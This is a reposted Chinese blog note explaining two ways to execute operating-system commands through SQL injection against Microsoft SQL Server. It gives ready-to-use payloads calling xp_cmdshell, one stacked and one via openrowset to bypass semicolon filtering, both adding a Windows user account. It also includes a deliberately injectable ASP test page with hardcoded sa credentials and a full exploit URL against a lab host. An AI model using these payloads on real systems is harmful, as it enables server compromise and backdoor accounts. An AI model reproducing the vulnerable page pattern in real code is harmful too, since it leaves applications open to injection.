MSSQL注入两种执行命令的方法

栏目: 数据库 · SQL Server · 发布时间: 6年前

内容简介:MSSQL注入两种执行命令的方法

以前遇到了一个站,Php+Mssql,不能多语句执行,就是找不到不用多语句来执行命令的方法。

其实大牛早就玩烂的东西,在自己博客做个总结笔记。

MSSQL注入两种执行命令的方法

1.能多语句。

;exec xp_cmdshell('net user luan$ lu4n.com /add');--

这个方法应该都知道,没什么可说的,图也不配了。

2.不能多语句。

这个不能多语句的原因,可能是网站过滤了分号,也可能是连接数据库的时候就限制了不能多语句执行。反正以前就是觉得很蛋疼的情况了。

select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add''')

这种情况,只要能带入下面这个 sql 语句即可调用xp_cmdshell,或者其他的存储过程

而且这方法还能得到执行命令的回显。

我的测试环境:

Win2003

IIS6

SqlServer 2000

mssqli.asp:

<%
 dim sql
 sql ="select * from spt_values where name='"&request("name")&"'"
 sql = replace(sql,";","")
 set conn=server.createobject("adodb.connection")
 conn.open "provider=sqloledb;source=local;uid=sa;pwd=sa;database=master"
 set rs=server.createobject("adodb.recordset")
 rs.open sql,conn,3,2
 Do While not rs.EOF
  response.write rs("name")
  rs.MoveNext
 Loop
 rs.close()
 conn.close()
%>

测试前:

MSSQL注入两种执行命令的方法

exp1:

http://192.168.52.136/mssqli.asp?name=rpc'and 'lu4n.com'=(select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add'''))--

截图:

MSSQL注入两种执行命令的方法

看截图是报错了,但是子查询已经完成了,命令已经执行了,只是直接这样子拿不到回显。报错注入如何回显可以参考大牛的 文章

测试后:

MSSQL注入两种执行命令的方法

sqlmap最新版里居然没有这个方法,而我在国内的很老的文章里就看到了这个方法…

sqlmap里有个功能mssql注入能切换身份来执行sql语句,但是需要其他用户的账号密码。


以上所述就是小编给大家介绍的《MSSQL注入两种执行命令的方法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

互联网寡头战争

互联网寡头战争

屈运栩 / 浙江大学出版社 / 2017-5-1 / CNY 49.00

本书意在复盘2015年下半年资本寒冬袭来之后,互联网行业发生的小巨头并购等连锁反应,揭示其背后推手——以BAT(百度、阿里巴巴、腾讯)为首的互联网巨头在零售、出行、本地生活、金融等行业的布局竞争,记录和呈现行业新贵的选择与博弈,深度剖析中国互联网生态的演进过程。一起来看看 《互联网寡头战争》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

在线进制转换器
在线进制转换器

各进制数互转换器

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码